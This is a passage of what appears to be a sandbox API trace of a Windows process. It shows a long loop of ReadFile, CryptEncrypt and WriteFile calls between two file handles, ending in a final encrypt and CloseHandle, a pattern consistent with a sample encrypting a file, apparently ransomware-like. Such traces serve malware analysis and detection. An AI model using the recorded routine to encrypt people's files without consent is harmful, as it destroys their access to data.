dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.399] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.400] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.401] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.402] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.403] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.404] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.405] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.405] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.405] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.405] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.406] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.406] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x290, lpOverlapped=0x0) returned 1 [0269.406] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x290, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x2a0) returned 1 [0269.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x2a0, lpOverlapped=0x0) returned 1 [0269.407] CloseHandle (hObject=0x5d48) returned 1 [0269.407] CloseHandle (hObject=0x5d3c) returned 1 [0269.407] 